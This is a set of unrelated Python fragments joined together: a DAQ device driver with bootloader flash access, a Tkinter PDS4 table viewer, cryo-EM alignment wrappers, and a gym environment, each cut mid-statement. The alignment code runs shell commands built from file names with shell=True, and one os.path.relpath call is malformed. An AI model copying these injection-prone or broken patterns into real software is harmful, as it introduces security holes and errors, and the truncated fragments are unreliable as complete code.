r_buffer = self.device.sock.recv(1024)
except socket.timeout:
raise TimeoutError('SettingsMemory_R: timeout error.')
return
if len(r_buffer) == MSG_HEADER_SIZE + MSG_CHECKSUM_SIZE + replyCount:
if r_buffer[MSG_INDEX_START] == s_buffer[0] and \
r_buffer[MSG_INDEX_COMMAND] == s_buffer[MSG_INDEX_COMMAND] | MSG_REPLY and \
r_buffer[MSG_INDEX_FRAME] == s_buffer[2] and \
r_buffer[MSG_INDEX_STATUS] == MSG_SUCCESS and \
r_buffer[MSG_INDEX_COUNT_LOW] == replyCount & 0xff and \
r_buffer[MSG_INDEX_COUNT_HIGH] == (replyCount >> 8) & 0xff and \
r_buffer[MSG_INDEX_DATA+replyCount] + self.device.calcChecksum(r_buffer,(MSG_HEADER_SIZE+replyCount)) == 0xff :
result = True
value = int.from_bytes(r_buffer[MSG_INDEX_DATA:MSG_INDEX_DATA+replyCount], byteorder='little')
try:
if (result == False):
raise ResultError
except ResultError:
print('Error in SettingsMemory_R E-1608. Status =', hex(r_buffer[MSG_INDEX_STATUS]))
return -1
return value
def SettingsMemory_W(self, address, count, data):
"""
This command writes to the nonvolatile settings memory. The settings memory
is 512 bytes (address 0 - 0x1ff). The amount of data to be
written is inferred from the frame count - 2. The maximum that
can be written in one transfer is 512 bytes. The settings will
be implemented after a device reset.
"""
if (count > 512 or address > 0x1ff):
return False
dataCount = count + 2
replyCount = 0
result = False
s_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+dataCount) # send buffer
r_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+replyCount) # reply buffer
s_buffer[MSG_INDEX_COMMAND] = self.CMD_SETTINGS_MEMORY_W
s_buffer[MSG_INDEX_DATA] = address & 0xff
s_buffer[MSG_INDEX_DATA+1] = (address>>8) & 0xff
for i in range(count):
s_buffer[MSG_INDEX_DATA+2+i] = data[i]
s_buffer[MSG_INDEX_START] = MSG_START
s_buffer[MSG_INDEX_FRAME] = self.device.frameID
self.device.frameID = (self.device.frameID + 1) % 256 # increment frame ID with every send
s_buffer[MSG_INDEX_STATUS] = 0
s_buffer[MSG_INDEX_COUNT_LOW] = (dataCount & 0xff)
s_buffer[MSG_INDEX_COUNT_HIGH] = ((dataCount>>8) & 0xff)
s_buffer[MSG_INDEX_DATA+dataCount] = 0xff - self.device.calcChecksum(s_buffer, MSG_INDEX_DATA+dataCount)
self.device.sock.settimeout(.1)
self.device.sendMessage(s_buffer)
try:
r_buffer = self.device.sock.recv(1024)
except socket.timeout:
raise TimeoutError('SettingsMemory_W: timeout error.')
return
if len(r_buffer) == MSG_HEADER_SIZE + MSG_CHECKSUM_SIZE + replyCount:
if r_buffer[MSG_INDEX_START] == s_buffer[0] and \
r_buffer[MSG_INDEX_COMMAND] == s_buffer[MSG_INDEX_COMMAND] | MSG_REPLY and \
r_buffer[MSG_INDEX_FRAME] == s_buffer[2] and \
r_buffer[MSG_INDEX_STATUS] == MSG_SUCCESS and \
r_buffer[MSG_INDEX_COUNT_LOW] == replyCount & 0xff and \
r_buffer[MSG_INDEX_COUNT_HIGH] == (replyCount >> 8) & 0xff and \
r_buffer[MSG_INDEX_DATA+replyCount] + self.device.calcChecksum(r_buffer,(MSG_HEADER_SIZE+replyCount)) == 0xff :
result = True
try:
if (result == False):
raise ResultError
except ResultError:
print('Error in SettingsMemory_W E-1608. Status =', hex(r_buffer[MSG_INDEX_STATUS]))
def BootloaderMemory_R(self, address, count):
"""
This command reads the bootloader stored in nonvolatile FLASH
memory. The bootloader is located in program FLASH memory in two
physical address ranges: 0x1D000000 - 0x1D007FFF for bootloader
code and 0x1FC00000 - 0x1FC01FFF for C startup code and
interrupts. Reads may be performed at any time.
address: the start address for reading (see above)
count: the number of bytes to read (max 512)
"""
if (count > 512):
return False
dataCount = 4
replyCount = count
result = False
s_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+dataCount) # send buffer
r_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+replyCount) # reply buffer
s_buffer[MSG_INDEX_COMMAND] = self.CMD_BOOT_MEMORY_R
s_buffer[MSG_INDEX_DATA] = address & 0xff
s_buffer[MSG_INDEX_DATA+1] = (address>>8) & 0xff
s_buffer[MSG_INDEX_DATA+2] = count & 0xff
s_buffer[MSG_INDEX_DATA+3] = (count>>8) & 0xff
s_buffer[MSG_INDEX_START] = MSG_START
s_buffer[MSG_INDEX_FRAME] = self.device.frameID
self.device.frameID = (self.device.frameID + 1) % 256 # increment frame ID with every send
s_buffer[MSG_INDEX_STATUS] = 0
s_buffer[MSG_INDEX_COUNT_LOW] = (dataCount & 0xff)
s_buffer[MSG_INDEX_COUNT_HIGH] = ((dataCount>>8) & 0xff)
s_buffer[MSG_INDEX_DATA+dataCount] = 0xff - self.device.calcChecksum(s_buffer, MSG_INDEX_DATA+dataCount)
self.device.sock.settimeout(.1)
self.device.sendMessage(s_buffer)
try:
r_buffer = self.device.sock.recv(1024)
except socket.timeout:
raise TimeoutError('BootloaderMemory_R: timeout error.')
return
if len(r_buffer) == MSG_HEADER_SIZE + MSG_CHECKSUM_SIZE + replyCount:
if r_buffer[MSG_INDEX_START] == s_buffer[0] and \
r_buffer[MSG_INDEX_COMMAND] == s_buffer[MSG_INDEX_COMMAND] | MSG_REPLY and \
r_buffer[MSG_INDEX_FRAME] == s_buffer[2] and \
r_buffer[MSG_INDEX_STATUS] == MSG_SUCCESS and \
r_buffer[MSG_INDEX_COUNT_LOW] == replyCount & 0xff and \
r_buffer[MSG_INDEX_COUNT_HIGH] == (replyCount >> 8) & 0xff and \
r_buffer[MSG_INDEX_DATA+replyCount] + self.device.calcChecksum(r_buffer,(MSG_HEADER_SIZE+replyCount)) == 0xff :
result = True
value = int.from_bytes(r_buffer[MSG_INDEX_DATA:MSG_INDEX_DATA+replyCount], byteorder='little')
try:
if (result == False):
raise ResultError
except ResultError:
print('Error in BootloaderMemory_R E-1608. Status =', hex(r_buffer[MSG_INDEX_STATUS]))
return -1
return value
def BootloaderMemory_W(self, address, count, data):
"""This command writes the bootloader stored in nonvolatile FLASH
memory. The bootloader is located in program FLASH memory in two
physical address ranges: 0x1D000000 - 0x1D007FFF for bootloader
code and 0x1FC00000 - 0x1FC01FFF for C startup code and
interrupts. Writes outside these ranges are ignored. The
bootloader memory is write protected and must be unlocked in
order to write the memory. The unlock proceedure is to write the
unlock code 0xAA55 to address 0xFFFFFFFE. Writes to the entire
memory range are then possible. Write any other value to address
0xFFFFFFFE to lock the memory after writing.
The FLASH memory must be erased prior to programming. A bulk
erase is perfomred by writing 0xAA55 to address 0x80000000 after
unlocking the memory for write. The bulk erase will require
approximately 150ms to complete. Once the erase is complete, the
memory may be written; however, the device will not be able to
boot unless it has a valid bootloader so the device shold not be
reset until the bootloader is completely written and verified
using BootloaderMemory_R().
The writes are perfomred on 4-byte boundaries internally and it is
recommended that the output data be sent in the same manner. The
amount of data to be written is inferred frolm the frame
count-2.
"""
if (count > 512):
return False
dataCount = count + 2
replyCount = 0
result = False
s_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+dataCount) # send buffer
r_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+replyCount) # reply buffer
s_buffer[MSG_INDEX_COMMAND] = self.CMD_BOOT_MEMORY_W
s_buffer[MSG_INDEX_DATA] = address & 0xff
s_buffer[MSG_INDEX_DATA+1] = (address>>8) & 0xff
for i in range(count):
s_buffer[MSG_INDEX_DATA+2+i] = data[i]
s_buffer[MSG_INDEX_START] = MSG_START
s_buffer[MSG_INDEX_FRAME] = self.device.frameID
self.device.frameID = (self.device.frameID + 1) % 256 # increment frame ID with every send
s_buffer[MSG_INDEX_STATUS] = 0
s_buffer[MSG_INDEX_COUNT_LOW] = (dataCount & 0xff)
s_buffer[MSG_INDEX_COUNT_HIGH] = ((dataCount>>8) & 0xff)
s_buffer[MSG_INDEX_DATA+dataCount] = 0xff - self.device.calcChecksum(s_buffer, MSG_INDEX_DATA+dataCount)
self.device.sock.settimeout(.1)
self.device.sendMessage(s_buffer)
try:
r_buffer = self.device.sock.recv(1024)
except socket.timeout:
raise TimeoutError('BootloaderMemory_W: timeout error.')
return
if len(r_buffer) == MSG_HEADER_SIZE + MSG_CHECKSUM_SIZE + replyCount:
if r_buffer[MSG_INDEX_START] == s_buffer[0] and \
r_buffer[MSG_INDEX_COMMAND] == s_buffer[MSG_INDEX_COMMAND] | MSG_REPLY and \
r_buffer[MSG_INDEX_FRAME] == s_buffer[2] and \
r_buffer[MSG_INDEX_STATUS] == MSG_SUCCESS and \
r_buffer[MSG_INDEX_COUNT_LOW] == replyCount & 0xff and \
r_buffer[MSG_INDEX_COUNT_HIGH] == (replyCount >> 8) & 0xff and \
r_buffer[MSG_INDEX_DATA+replyCount] + self.device.calcChecksum(r_buffer,(MSG_HEADER_SIZE+replyCount)) == 0xff :
result = True
try:
if (result == False):
raise ResultError
except ResultError:
print('Error in BootloaderMemory_W E-1608. Status =', hex(r_buffer[MSG_INDEX_STATUS]))
def getMFGCAL(self):
"""
get the manufacturers calibration data (timestamp) from the
Calibration memory
"""
# get the year (since 2000)
address = 0x50
data ,= unpack('B', self.CalMemory_R(address, 1))
year = 2000+data
# get the month
address = 0x51
month ,= unpack('B', self.CalMemory_R(address, 1))
# get the day
address = 0x52
day ,= unpack('B', self.CalMemory_R(address, 1))
# get the hour
address = 0x53
hour ,= unpack('B', self.CalMemory_R(address, 1))
# get the minute
address = 0x54
minute ,= unpack('B', self.CalMemory_R(address, 1))
# get the second
address = 0x55
second ,= unpack('B', self.CalMemory_R(address, 1))
mdate = datetime(year, month, day, hour, minute, second)
return mdate
def MACaddress(self):
"""
Gets the MAC address
"""
# get lowest thress byes of MAC address
address = 0x1fd
value = self.CalMemory_R(address, 3)
self.device.MAC = ((0x00802f) << 24) + (value[0]<<16) + (value[1]<<8) + value[2]
return self.device.MAC
@staticmethod
def volts(value, gain):
# converts raw values to volts
if gain == BP_10V:
volt = (value - 0x8000)*10.0/32768
elif gain == BP_5V:
volt = (value - 0x8000)*5.0/32768
elif gain == BP_2V:
volt = (value - 0x8000)*2.0/32768
elif gain == BP_1V:
volt = (value - 0x8000)*1.0/32768
else:
raise ValueError('volts: unkown gain.')
return False
return volt
@staticmethod
def valueAOut(volts):
# converts volts to a 16 bit raw value for +/- 10V output
if (volts >= 10.0):
return | |
<gh_stars>1-10
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import platform
import binascii
import functools
import numpy as np
from math import ceil, floor
from .core import DataViewWindow, Window
from .widgets.tooltip import ToolTip
from .widgets.tree import TreeView
from ..reader.table_objects import TableStructure, Meta_Field
from ..reader.data import PDS_array
from ..utils.helpers import is_array_like
from ..utils.logging import logger_init
from ..extern import six
from ..extern.six.moves.tkinter import (Menu, Frame, Text, Label, Entry, Button, Scrollbar,
BooleanVar, TclError)
# Initialize the logger
logger = logger_init()
#################################
class TabularViewWindow(DataViewWindow):
""" Window that displays PDS4 Table data structures as tables.
This window will display tabular data. After creating it, you should use the open_table() method to load
the table that it needs to display.
"""
def __init__(self, viewer):
# Create basic data view window
super(TabularViewWindow, self).__init__(viewer)
# Will be set to the fields for the table structure
self.data = None
# Pack the display frame, which contains the scrollbars and the scrollable canvas
self._display_frame.pack(side='left', anchor='nw', expand=1, fill='both')
# The window_resize binding adds/removes rows and columns onto the screen based on window size
self._canvas.bind('<Configure>', self._window_resize)
# Add notify event for scroll wheel (used to scroll table via scroll wheel)
self._bind_scroll_event(self._mousewheel_scroll)
# Menu option variables. These are TKinter type wrappers around standard Python variables. The
# advantage is that you can use trace(func) on them, to call func whenever one of these variables
# is changed
menu_options = [{'name': 'display_data_as_formatted', 'type': BooleanVar(), 'default': True,
'trace': lambda *args: self._update_vertical_table_display(self._vert_scrollbar.get())}]
for option in menu_options:
var = option['type']
self._menu_options[option['name']] = var
self._add_trace(var, 'w', option['trace'], option['default'])
# These variables are used to store widgets, and info about them, used for displaying tabular data
self._data_boxes = []
self._background_boxes = []
self._deleted_boxes = []
# Loads the table structure into this window and displays it for the user
def load_table(self, table_structure):
# Set a title for the window
self.set_window_title("{0} - Table '{1}'".format(self.get_window_title(), table_structure.id))
# Set necessary instance variables for this DataViewWindow
self.structure = table_structure
self.data = self.structure.fields
self.meta_data = table_structure.meta_data if hasattr(table_structure, 'meta_data') else None
self._settings = {'num_rows': len(self.data[0]), 'num_columns': len(self.data),
'num_display_rows': 0, 'display_start_row': 0,
'num_display_cols': 0, 'display_start_col': 0}
# Add vertical scrollbar for the table
self._vert_scrollbar = Scrollbar(self._display_frame, orient='vertical', command=self._vertical_scroll)
self._vert_scrollbar.pack(side='right', fill='y')
# Add horizontal scrollbar for the table
self._horz_scrollbar = Scrollbar(self._display_frame, orient='horizontal', command=self._horizontal_scroll)
self._horz_scrollbar.pack(side='bottom', fill='x')
# Pack the static canvas, which contains the scrollable canvas
self._static_canvas.pack(side='left', anchor='nw', expand=1, fill='both')
# Pack the scrollable canvas, which contains the table itself
self._scrollable_canvas.pack(expand=1, fill='both')
# Create row count label on left
box = Frame(self._scrollable_canvas, height=20, width=50)
box.grid(row=0, column=0, pady=(10, 6), padx=14)
label = Label(box, text='Row #', font=self.get_font(size=8), bd=0)
label.pack(fill='both', expand=2)
# Adds new menu options used for manipulating the data
self._add_menus()
# Mark table as open, simulate window resizing to populate the window with the table's data
self._data_open = True
self._widget.update_idletasks()
self._window_resize(None)
# Sets 'display_data_as_formatted' menu_option to either display_data_as_formatted or display it as
# unformatted. Updates the on-screen values.
def set_display_data_format(self, formatted=True):
self._menu_options['display_data_as_formatted'].set(formatted)
self._update_vertical_table_display(self._vert_scrollbar.get())
# Adds menu options used for manipulating the data display
def _add_menus(self):
# Add an Options menu
options_menu = self._add_menu('Options', in_menu='main', index=2)
# Add a Data Formatting sub-menu to the Options menu
formatting_menu = self._add_menu('Data formatting', in_menu='Options')
formatting_menu.add_checkbutton(label='Use field format', onvalue=True, offvalue=False,
variable=self._menu_options['display_data_as_formatted'])
formatting_menu.add_checkbutton(label='Ignore field format', onvalue=False, offvalue=True,
variable=self._menu_options['display_data_as_formatted'])
# Add a View menu
self._add_view_menu()
# Draws the data from self.data on the screen by adding the appropriate widgets
#
# draw_row and draw_col are dictionaries with 'start' and 'stop' values, indicating the physical location
# of the rows and columns that should be added to the screen. The exception being a row start value of -1,
# which indicates that the row to add contains the 'column names' header (top row), and a column value
# of -1 which indicates that the column to add contains the 'row count' (left most column). data_row_offset
# and data_col_offset are used to indicate the difference between the physical location of the row/column
# in the table displayed on the screen and the row/column of the data variable that should be used as to
# pull the value for that physical location (e.g. get_data_point(row + data_row_offset, col + data_col_offset),
# where row is a value between draw_row's 'start' and 'stop' values) and similar for col).
def _draw_data(self, draw_row, draw_col, data_row_offset=0, data_col_offset=0):
# Create column names
if draw_row['start'] == -1:
for column in range(draw_col['start'], draw_col['stop']):
box = Frame(self._scrollable_canvas, height=20)
box.grid(row=0, column=column + 1, padx=6, pady=(10, 4))
interior_box = Frame(box, height=18, width=126)
interior_box.pack()
interior_box.pack_propagate(False)
column_name_idx = column + data_col_offset
column_name = self.data[column_name_idx].meta_data.full_name(skip_parents=True)
entry = Entry(interior_box, bd=0, highlightthickness=0, font=self.get_font(9, 'bold'),
cursor='arrow')
entry.insert(0, column_name)
entry.configure(state='readonly')
entry.pack(fill='both', expand=2)
self._background_boxes.append({'box': box, 'row': -1, 'col': column})
self._data_boxes.append({'entry': entry, 'row': -1, 'col': column})
FieldDefinitionToolTip(self, entry, column)
# Create row numbers
if draw_col['start'] == -1:
for row in range(draw_row['start'], draw_row['stop']):
border_box = Frame(self._scrollable_canvas, height=20, width=50, background='black')
border_box.grid(row=row + 1, column=0, padx=6, pady=2)
interior_box = Frame(border_box, height=18, width=48, background='white')
interior_box.pack(fill='both', expand=2, padx=1, pady=1)
interior_box.pack_propagate(False)
data_row = row + data_row_offset
entry = Entry(interior_box, bd=0, highlightthickness=0, readonlybackground='white', justify='center')
entry.insert(0, data_row)
entry.configure(state='readonly')
entry.pack(fill='both', expand=2, padx=4)
self._background_boxes.append({'box': border_box, 'row': row, 'col': -1})
self._data_boxes.append({'entry': entry, 'row': row, 'col': -1})
# Create values
for column in range(draw_col['start'], draw_col['stop']):
for row in range(draw_row['start'], draw_row['stop']):
border_box = Frame(self._scrollable_canvas, height=20, width=130, background='black')
border_box.grid(row=row + 1, column=column + 1, padx=4, pady=2)
interior_box = Frame(border_box, height=18, width=128, background='white')
interior_box.pack(fill='both', expand=2, padx=1, pady=1)
interior_box.pack_propagate(False)
data_row = row + data_row_offset
data_column = column + data_col_offset
entry = Entry(interior_box, bd=0, highlightthickness=0, readonlybackground='white')
open_table = Button(interior_box, text='Table', font=self.get_font(weight='bold'))
data_box = {'entry': entry, 'open_table': open_table, 'row': row, 'col': column}
self._set_data_point_widget(data_row, data_column, data_box)
entry.configure(state='readonly')
self._background_boxes.append({'box': border_box, 'row': row, 'col': column})
self._data_boxes.append(data_box)
# Erases the appropriate widgets from the screen
#
# erase_row and erase_col are dictionaries with 'start' and 'stop' values, indicating the physical
# location of the rows and columns that should be removed from the table being displayed on the screen
def _erase_data(self, erase_row, erase_col):
# Obtain indicies of background boxes (which contain the entries, which contain the data point values)
# that need to be deleted
remove_bg_box_idxs = [i for i, data_box in enumerate(self._data_boxes)
if erase_row['start'] <= data_box['row'] <= erase_row['stop']
if erase_col['start'] <= data_box['col'] <= erase_col['stop']]
# Remove data boxes that are being deleted from being tracked
self._data_boxes = [data_box
for i, data_box in enumerate(self._data_boxes) if i not in remove_bg_box_idxs]
# Remove the background boxes that need to be deleted from the screen
deleted_boxes = []
for i in range(0, len(remove_bg_box_idxs)):
box = self._background_boxes[remove_bg_box_idxs[i]]
deleted_boxes.append(box)
box['box'].grid_forget()
# Ideally we could use .destroy() in the above method, instead of .grid_forget(). However, at least
# on Windows, calling destroy() seems to lead TK to call the widget's (Toplevel) size configure
# and tell it to stay the same size as it was when window was initially grabbed to start resizing
# (therefore the window is immediately resized back to its original size when you make it smaller.)
# Instead we simply hide the boxes above and delete them only if we have built up too many
# boxes, and only after waiting 5s (because if we do some immediately then it is done while still
# resizing and therefore window will resize back to before user grabbed it, which is jarring). Note
# that the window may temporarily freeze during deletion. Think and test carefully if adjusting
# this code.
def destroy_boxes(boxes):
for i in range(len(boxes) - 1, -1, -1):
boxes[i]['box'].destroy()
boxes.remove(boxes[i])
self._deleted_boxes += deleted_boxes
if len(self._deleted_boxes) > 750:
self._widget.after(5000, lambda *args: destroy_boxes(self._deleted_boxes))
# Remove the background boxes that were deleted from being tracked
for box in deleted_boxes:
self._background_boxes.remove(box)
# Adjusts the widget controlling what is displayed for the row and column indicies specified to be the
# contents of data_box. Note that row and column specify the data row and column, the physical location
# on the screen is data_box[row] and data_box[col]
def _set_data_point_widget(self, row, column, data_box):
field = self.data[column]
data_point = field[row]
meta_data = field.meta_data
# Handle case where the data point is another array-like (e.g. | |
u"peaksigTriMat": True,
u"translations":True, u"pixRegError":True,
u"CTFDiag":True, u"logisticWeights": True, u"FRC": True,
u'Transparent': True, u'plot_dpi':144, u'image_dpi':250,
u'image_cmap':u'gray', u'graph_cmap':u'gnuplot',
u'fontsize':12, u'fontstyle': u'serif', u'colorbar': True,
u'backend': u'Qt4Agg', u'multiprocess':True,
u'show':False }
pass
def initDefaultFiles( self, stackName ):
self.files[u'stack'] = stackName
self.files[u'config'] = stackName + u".zor"
stackPath, stackFront = os.path.split( stackName )
stackFront = os.path.splitext( stackFront )[0]
if not 'compressor' in self.files or not bool(self.files['compressor']):
mrcExt = ".mrc"
mrcsExt = ".mrcs"
else:
mrcExt = ".mrcz"
mrcsExt = ".mrcsz"
self.files[u'align'] = os.path.relpath(
os.path.join( u"./align", "%s_zorro_movie%s" %(stackFront, mrcsExt) ),
start=stackPath )
self.files[u'sum'] = os.path.relpath( stackPath,
os.path.join( u"./sum", "%s_zorro%s" %(stackFront, mrcExt) ),
start=stackPath )
self.files[u'figurePath'] = os.path.relpath(
os.path.join(stackPath, u"./figs"), start=stackPath )
def xcorr2_mc2_1( self, gpu_id = 0, loadResult=True, clean=True ):
"""
This makes an external operating system call to the Cheng's lab GPU-based
B-factor multireference executable. It and CUDA libraries must be on the system
path and libary path respectively.
NOTE: Spyder looks loads PATH and LD_LIBRARY_PATH from .profile, not .bashrc
"""
dosef_cmd = util.which("dosefgpu_driftcorr")
if dosef_cmd is None:
print( "Error: dosefgpu_driftcorr not found in system path." )
return
#tempFileHash = str(uuid.uuid4() ) # Key let's us multiprocess safely
stackBase = os.path.basename( os.path.splitext( self.files['stack'] )[0] )
if self.cachePath is None:
self.cachePath = "."
InName = os.path.join( self.cachePath, stackBase + u"_mcIn.mrc" )
# Unfortunately these files may as well be in the working directory.
OutAvName = os.path.join( self.cachePath, stackBase + u"_mcOutAv.mrc" )
OutStackName = os.path.join( self.cachePath, stackBase + u"_mcOut.mrc" )
logName = os.path.join( self.cachePath, stackBase + u"_mc.zor" )
mrcz.writeMRC( self.images, InName )
# Force binning to 1, as performance with binning is poor
binning = 1
if self.Brad is not None:
# Li masking is in MkPosList() in cufunc.cu (line 413)
# Their r2 is normalized and mine isn't
# Li has mask = exp( -0.5 * bfactor * r_norm**2 )
# r_norm**2 = x*x/Nx*Nx + y*y/Ny*Ny = r**2 / (Nx**2 + Ny**2)
# For non-square arrays they have a non-square (but constant frequency) filter
# RAM has mask = exp( -(r/brad)**2 )
# We can only get Bfactor approximately then but it's close enough for 3710x3838
bfac = 2.0 * (self.images.shape[1]**2 + self.images.shape[2]**2) / (self.Brad**2)
print( "Using B-factor of " + str(bfac) + " for dosefgpu_driftcorr" )
else:
bfac = 1000 # dosef default 'safe' bfactor for mediocre gain reference
# Consider: Dosef suffers at the ends of the sequence, so make the middle frame zero drift?
# align_to = np.floor( self.images.shape[0]/2 )
# This seems to cause more problems then it's worth.
align_to = 0
if self.diagWidth != None:
fod = self.diagWidth
else:
fod = 0
# Dosef can limit search to a certain box size
if self.maxShift == None:
maxshift = 96
else:
maxshift = self.maxShift * 2
if self.startFrame == None:
self.startFrame = 0
if self.endFrame == None:
self.endFrame = 0
motion_flags = ( " " + InName
+ " -gpu " + str(gpu_id)
+ " -nss " + str(self.startFrame)
+ " -nes " + str(self.endFrame)
+ " -fod " + str(fod)
+ " -bin " + str(binning)
+ " -bft " + str(bfac)
+ " -atm -" + str(align_to)
+ " -pbx " + str(maxshift)
+ " -ssc 1 -fct " + OutStackName
+ " -fcs " + OutAvName
+ " -flg " + logName )
sub = subprocess.Popen( dosef_cmd + motion_flags, shell=True )
sub.wait()
self.loadMCLog( logName )
time.sleep(0.5)
if bool(clean):
try: os.remove(InName)
except: pass
try: os.remove(OutStackName)
except: pass
try: os.remove(OutAvName)
except: pass
try: os.remove(logName)
except: pass
def loadMCLog( self, logName ):
"""
Load and part a MotionCorr log from disk using regular expressions.
"""
import re
# Parse to get the translations
fhMC = open( logName )
MClog = fhMC.readlines()
fhMC.close()
# Number of footer lines changes with the options you use.
# I would rather find Sum Frame #000
for linenumber, line in enumerate(MClog):
try:
test = re.findall( "Sum Frame #000", line)
if bool(test):
frameCount = np.int( re.findall( "\d\d\d", line )[1] ) + 1
break
except: pass
MClog_crop = MClog[linenumber+1:linenumber+frameCount+1]
MCdrifts = np.zeros( [frameCount,2] )
for J in np.arange(0,frameCount):
MCdrifts[J,:] = re.findall( r"([+-]?\d+.\d+)", MClog_crop[J] )[1:]
# Zorro saves translations, motioncorr saves shifts.
self.translations = -np.fliplr( MCdrifts )
if self.originMode == u'centroid':
centroid = np.mean( self.translations, axis=0 )
self.translations -= centroid
def xcorr2_unblur1_02( self, dosePerFrame = None, minShift = 2.0, terminationThres = 0.1,
maxIteration=10, verbose=False, loadResult=True, clean=True ):
"""
Calls UnBlur by <NAME> Rohou using the Zorro interface.
"""
self.bench['unblur0'] = time.time()
unblur_exename = "unblur_openmp_7_17_15.exe"
if util.which( unblur_exename ) is None:
print( "UnBlur not found in system path" )
return
print( "Calling UnBlur for " + self.files['stack'] )
print( " written by <NAME> and <NAME>: http://grigoriefflab.janelia.org/unblur" )
print( " http://grigoriefflab.janelia.org/node/4900" )
import os
try: os.umask( self.umask ) # Why is Python not using default umask from OS?
except: pass
if self.cachePath is None:
self.cachePath = "."
# Force trailing slashes onto cachePatch
stackBase = os.path.basename( os.path.splitext( self.files[u'stack'] )[0] )
frcOutName = os.path.join( self.cachePath, stackBase + u"_unblur_frc.txt" )
shiftsOutName = os.path.join( self.cachePath, stackBase + u"_unblur_shifts.txt" )
outputAvName = os.path.join( self.cachePath, stackBase + u"_unblur.mrc" )
outputStackName = os.path.join( self.cachePath, stackBase + u"_unblur_movie.mrc" )
ps = self.pixelsize * 10.0
if 'dose' in self.filterMode:
doDoseFilter = True
if dosePerFrame == None:
# We have to guesstimate the dose per frame in e/A^2 if it's not provided
dosePerFrame = np.mean( self.images ) / (ps*ps)
preExposure = 0.0
if 'dosenorm' in self.filterMode:
restoreNoise=True
else:
restoreNoise=False
else:
doDoseFilter = False
if self.Brad is not None:
# Li masking is in MkPosList() in cufunc.cu (line 413)
# Their r2 is normalized and mine isn't
# Li has mask = exp( -0.5 * bfactor * r_norm**2 )
# r_norm**2 = x*x/Nx*Nx + y*y/Ny*Ny = r**2 / (Nx**2 + Ny**2)
# For non-square arrays they have a non-square (but constant frequency) filter
# RAM has mask = exp( -(r/brad)**2 )
# We can only get Bfactor approximately then but it's close enough for 3710x3838
bfac = 2.0 * (self.images.shape[1]**2 + self.images.shape[2]**2) / (self.Brad**2)
print( "Using B-factor of " + str(bfac) + " for UnBlur" )
else:
bfac = 1500 # dosef default 'safe' bfactor for mediocre gain reference
outerShift = self.maxShift * ps
# RAM: I see no reason to let people change the Fourier cross masking
vertFouMaskHW = 1
horzFouMaskHW = 1
try:
mrcName = os.path.join( self.cachePath, stackBase + "_unblurIN.mrc" )
mrcz.writeMRC( self.images, mrcName )
except:
print( "Error in exporting MRC file to UnBlur" )
return
# Are there flags for unblur? Check the source code.
flags = "" # Not using any flags
unblurexec = ( unblur_exename + " " + flags + " << STOP_PARSING \n" + mrcName )
unblurexec = (unblurexec + "\n" + str(self.images.shape[0]) + "\n" +
outputAvName + "\n" + shiftsOutName + "\n" + str(ps) + "\n" +
str(doDoseFilter) )
if bool(doDoseFilter):
unblurexec += "\n" + str(dosePerFrame) + "\n" + str(self.voltage) + "\n" + str(preExposure)
unblurexec += ("\n yes \n" + outputStackName + "\n yes \n" +
frcOutName + "\n" + str(minShift) + "\n" + str(outerShift) + "\n" +
str(bfac) + "\n" + str( np.int(vertFouMaskHW) ) + "\n" + str( np.int(horzFouMaskHW) ) + "\n" +
str(terminationThres) + "\n" + str(maxIteration) )
if bool(doDoseFilter):
unblurexec += "\n" + str(restoreNoise)
unblurexec += "\n" + str(verbose)
unblurexec = unblurexec + "\nSTOP_PARSING"
print( unblurexec )
sub = subprocess.Popen( unblurexec, shell=True )
sub.wait()
try:
# Their FRC is significantly different from mine.
self.FRC = np.loadtxt(frcOutName, comments='#', skiprows=0 )
self.translations = np.loadtxt( shiftsOutName, | |
"""Gym environment for chnging colors of shapes."""
import numpy as np
import torch
import torch.nn as nn
import gym
from collections import OrderedDict
from dataclasses import dataclass
from gym import spaces
from gym.utils import seeding
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from PIL import Image
import skimage
from cswm import utils
import random
mpl.use('Agg')
def random_dag(M, N, g = None):
"""Generate a random Directed Acyclic Graph (DAG) with a given number of nodes and edges."""
if M == 3:
return np.array([[0, 0, 0],[1, 0, 0], [1, 0, 0]])
if M == 5:
return np.array([[0., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[1., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.]])
if g is None:
expParents = 5
idx = np.arange(M).astype(np.float32)[:,np.newaxis]
idx_maxed = np.minimum(idx * 0.5, expParents)
p = np.broadcast_to(idx_maxed/(idx+1), (M, M))
B = np.random.binomial(1, p)
B = np.tril(B, -1)
return B
else:
gammagt = np.zeros((M, M))
for e in g.split(","):
if e == "": continue
nodes = e.split("->")
if len(nodes) <= 1: continue
nodes = [int(n) for n in nodes]
for src, dst in zip(nodes[:-1], nodes[1:]):
if dst > src:
gammagt[dst,src] = 1
elif dst == src:
raise ValueError("Edges are not allowed from " +
str(src) + " to oneself!")
else:
raise ValueError("Edges are not allowed from " +
str(src) + " to ancestor " +
str(dst) + " !")
return gammagt
def diamond(r0, c0, width, im_size):
rr, cc = [r0, r0 + width // 2, r0 + width, r0 + width // 2], [c0 + width // 2, c0, c0 + width // 2, c0 + width]
return skimage.draw.polygon(rr, cc, im_size)
def square(r0, c0, width, im_size):
rr, cc = [r0, r0 + width, r0 + width, r0], [c0, c0, c0 + width, c0 + width]
return skimage.draw.polygon(rr, cc, im_size)
def triangle(r0, c0, width, im_size):
rr, cc = [r0, r0 + width, r0 + width], [c0 + width//2, c0, c0 + width]
return skimage.draw.polygon(rr, cc, im_size)
def cross(r0, c0, width, im_size):
diff1 = width // 3 + 1
diff2 = 2 * width // 3
rr = [r0 + diff1, r0 + diff2, r0 + diff2, r0 + width, r0 + width,
r0 + diff2, r0 + diff2, r0 + diff1, r0 + diff1, r0, r0, r0 + diff1]
cc = [c0, c0, c0 + diff1, c0 + diff1, c0 + diff2, c0 + diff2, c0 + width,
c0 + width, c0 + diff2, c0 + diff2, c0 + diff1, c0 + diff1]
return skimage.draw.polygon(rr, cc, im_size)
def pentagon(r0, c0, width, im_size):
